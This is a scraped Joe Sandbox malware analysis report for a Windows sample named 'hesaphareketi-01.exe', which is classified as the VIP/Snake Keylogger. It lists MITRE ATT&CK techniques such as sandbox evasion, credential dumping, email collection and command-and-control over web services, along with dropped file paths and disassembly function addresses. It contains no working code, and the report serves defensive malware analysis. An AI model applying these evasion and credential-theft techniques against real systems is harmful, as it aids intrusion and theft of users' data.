Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report hesaphareketi-01.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\hesaphareketi-01.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_htqyki2q.irf.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t11yzkaa.zkm.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uai1qor4.jls.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vvkkfpcb.wd0.ps1

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Windows Analysis Report
hesaphareketi-01.exe

Function 02D16FD8 Relevance: 2.2, Strings: 1, Instructions: 939
COMMON

Function 02D16FE8 Relevance: 2.2, Strings: 1, Instructions: 936
COMMON

Function 0133D051 Relevance: 6.1, APIs: 4, Instructions: 133
threadCOMMON

Function 0133D060 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Function 02D11790 Relevance: 1.8, APIs: 1, Instructions: 279
COMMON

Function 06F6A55C Relevance: 1.7, APIs: 1, Instructions: 249
processCOMMON

Function 06F6A568 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Function 0133ADC8 Relevance: 1.7, APIs: 1, Instructions: 199
COMMON

Function 02D118F0 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Function 013344B0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 0133590C Relevance: 1.6, APIs: 1, Instructions: 95
COMMON

Function 02D14040 Relevance: 1.6, APIs: 1, Instructions: 93
COMMON

Function 06F69ED8 Relevance: 1.6, APIs: 1, Instructions: 72
injectionCOMMON

Function 06F69EE0 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre